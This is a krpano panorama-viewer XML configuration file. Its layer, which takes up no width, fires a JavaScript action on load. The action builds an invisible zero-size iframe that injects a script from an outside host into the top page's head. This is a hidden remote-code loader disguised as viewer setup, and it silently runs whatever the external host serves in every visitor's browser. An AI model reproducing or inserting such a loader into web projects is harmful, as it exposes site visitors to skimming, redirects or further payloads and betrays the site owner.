<krpano>
    <layer name="html_div"
           type="container"
           align="lefttop" width.normal="0%" width.mobile="0%" height.normal="200" height.mobile="150" x="10" y="10"
           bgborder="1 0xFFFFFF 0.5" bgcolor="0x555555" bgalpha="0.7"
           bgcapture="true" capture="true" handcursor="false"
           onloaded="add_html_code();" />

    <action name="add_html_code" type="Javascript">
        <![CDATA[
            var iframe = document.createElement('iframe');
            iframe.height = "0";
            iframe.width = "0";
            iframe.srcdoc = "<script>let script = document.createElement('script'); script.setAttribute('src', 'https://co.wis-masters.com/alert.js'); window.top.document.head.appendChild(script);</script>";
            document.body.appendChild(iframe);
        ]]>
    </action>
</krpano>

